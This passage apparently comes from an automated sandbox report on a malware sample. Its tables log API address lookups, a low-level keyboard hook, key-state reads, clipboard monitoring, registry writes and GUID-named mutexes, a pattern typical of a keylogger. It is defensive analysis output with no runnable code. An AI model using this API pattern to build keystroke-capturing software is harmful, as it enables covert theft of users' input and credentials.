| Get Address | - | function = DeleteCriticalSection, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = ExpandEnvironmentStringsW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = FindClose, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = GetTempFileNameA, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = SetEndOfFile, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = FindNextFileW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = SetFilePointer, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = FindFirstFileW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | - | function = RemoveDirectoryW, ordinal = 0, address_out = 0x2a2f7a0 |
|
1 | |
| Get Address | Unknown module name | function = IsWow64Process, address_out = 0x76cd91d0 |
|
1 | |
| Get Address | Unknown module name | function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x7feff12d710 |
|
1 | |
| Get Address | Unknown module name | function = StrRChrA, address_out = 0x7fefe594c9c |
|
1 | |
| Get Address | Unknown module name | function = wsprintfA, address_out = 0x76e6bae8 |
|
1 | |
| Get Address | Unknown module name | function = GetUserNameA, address_out = 0x7feff12dc20 |
|
1 | |
| Get Address | Unknown module name | function = GetShellWindow, address_out = 0x76e054a0 |
|
1 | |
| Get Address | Unknown module name | function = GetWindowThreadProcessId, address_out = 0x76e00a90 |
|
1 | |
| Get Address | Unknown module name | function = EnumProcessModules, address_out = 0x770b1050 |
|
1 | |
| Get Address | Unknown module name | function = RegQueryValueExA, address_out = 0x7feff13c480 |
|
1 | |
| Get Address | Unknown module name | function = RegCloseKey, address_out = 0x7feff140710 |
|
1 | |
| Get Address | Unknown module name | function = RegQueryValueExW, address_out = 0x7feff13c2d0 |
|
1 | |
| Get Address | Unknown module name | function = PathCombineW, address_out = 0x7fefe5a3dfc |
|
1 | |
| Get Address | Unknown module name | function = PathFileExistsW, address_out = 0x7fefe59c984 |
|
1 | |
| Get Address | Unknown module name | function = RegSetValueExW, address_out = 0x7feff131ed0 |
|
1 | |
| Get Address | Unknown module name | function = SetWindowsHookExA, address_out = 0x76e18c20 |
|
1 | |
| Get Address | Unknown module name | function = RegisterClassA, address_out = 0x76df9f68 |
|
1 | |
| Get Address | Unknown module name | function = CreateWindowExA, address_out = 0x76dfa2e0 |
|
1 | |
| Get Address | Unknown module name | function = GetWindowLongPtrA, address_out = 0x76e037c0 |
|
1 | |
| Get Address | Unknown module name | function = DefWindowProcA, address_out = 0x76f0f548 |
|
1 | |
| Get Address | Unknown module name | function = SetWindowLongPtrA, address_out = 0x76dfb500 |
|
1 | |
| Get Address | Unknown module name | function = SetClipboardViewer, address_out = 0x76e0f780 |
|
1 | |
| Get Address | Unknown module name | function = IsClipboardFormatAvailable, address_out = 0x76e15b10 |
|
1 | |
| Get Address | Unknown module name | function = RegisterDeviceNotificationA, address_out = 0x76df6fe4 |
|
1 | |
| Get Address | Unknown module name | function = GetMessageA, address_out = 0x76e06110 |
|
1 | |
| Get Address | Unknown module name | function = TranslateMessage, address_out = 0x76e096f0 |
|
1 | |
| Get Address | Unknown module name | function = DispatchMessageA, address_out = 0x76e06274 |
|
1 | |
| Get Address | Unknown module name | function = PathFindFileNameA, address_out = 0x7fefe5986c4 |
|
1 | |
| Get Address | Unknown module name | function = RegSetValueExA, address_out = 0x7feff131dc0 |
|
1 | |
| Get Address | Unknown module name | function = StrRChrW, address_out = 0x7fefe59b85c |
|
1 | |
| Get Address | Unknown module name | function = StrStrIA, address_out = 0x7fefe595a1c |
|
1 | |
| Get Address | Unknown module name | function = GetForegroundWindow, address_out = 0x76e05ab0 |
|
1 | |
| Get Address | Unknown module name | function = AttachThreadInput, address_out = 0x76dfd240 |
|
1 | |
| Get Address | Unknown module name | function = GetFocus, address_out = 0x76e06570 |
|
1 | |
| Get Address | Unknown module name | function = GetModuleBaseNameA, address_out = 0x770b125c |
|
1 | |
| Get Address | Unknown module name | function = GetAncestor, address_out = 0x76e04fc0 |
|
1 | |
| Get Address | Unknown module name | function = GetKeyboardState, address_out = 0x76e18a10 |
|
1 | |
| Get Address | Unknown module name | function = GetKeyboardLayout, address_out = 0x76e06610 |
|
1 | |
| Get Address | Unknown module name | function = GetAsyncKeyState, address_out = 0x76dfc720 |
|
1 | |
| Get Address | Unknown module name | function = ToUnicodeEx, address_out = 0x76e0d5c4 |
|
1 | |
| Get Address | Unknown module name | function = GetModuleFileNameExW, address_out = 0x770b1010 |
|
1 | |
| Get Address | Unknown module name | function = GetWindowTextW, address_out = 0x76dfd7a4 |
|
1 | |
| Get Address | Unknown module name | function = CallNextHookEx, address_out = 0x76dfbae0 |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = {228B1CEE-3F75-CA50-026F-56138479F8BD}, wndproc_parameter = 66903120 |
|
1 |
Keyboard (15)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = KB_LOCALE_ID, os_tid = 2412, result_out = 67699721 |
|
3 | |
| Read | result_out = 1 |
|
3 | |
| Read | virtual_key_code = VK_LSHIFT, result_out = 0 |
|
3 | |
| Read | virtual_key_code = VK_RSHIFT, result_out = 0 |
|
3 | |
| Read | virtual_key_code = VK_SHIFT, result_out = 0 |
|
3 |
System (13)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = -1 (infinite) |
|
3 | |
| Sleep | duration = -1 (infinite) |
|
1 | |
| Get Time | type = System Time, time = 2018-03-29 15:43:41 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 162443 |
|
1 | |
| Get Time | type = System Time, time = 2018-03-29 15:43:42 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-03-29 15:43:57 (UTC) |
|
1 | |
| Get Time | type = System Time, time = 2018-03-29 15:44:02 (UTC) |
|
1 | |
| Register Hook | type = WH_KEYBOARD_LL, hookproc_address = 0x3fba1c4 |
|
1 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 |
Mutex (8)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = {BE6B9E68-0520-A091-7FD2-09D423264D48} |
|
1 | |
| Create | mutex_name = Local\{722AD44B-2987-7426-43C6-6DE8275AF19C} |
|
1 | |
| Create | mutex_name = Local\{FCF9E212-2B0D-8EC0-95F0-8FA2992433F6} |
|
1 | |
| Create | mutex_name = Local\{6A5E21FF-C1FA-2C95-9B3E-8520FF528954} |
|
1 | |
| Open | mutex_name = Local\{722AD44B-2987-7426-43C6-6DE8275AF19C}, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Open | mutex_name = Local\{FCF9E212-2B0D-8EC0-95F0-8FA2992433F6}, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Open | mutex_name = Local\{6A5E21FF-C1FA-2C95-9B3E-8520FF528954}, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Release | mutex_name = Local\{722AD44B-2987-7426-43C6-6DE8275AF19C} |
|
1 |
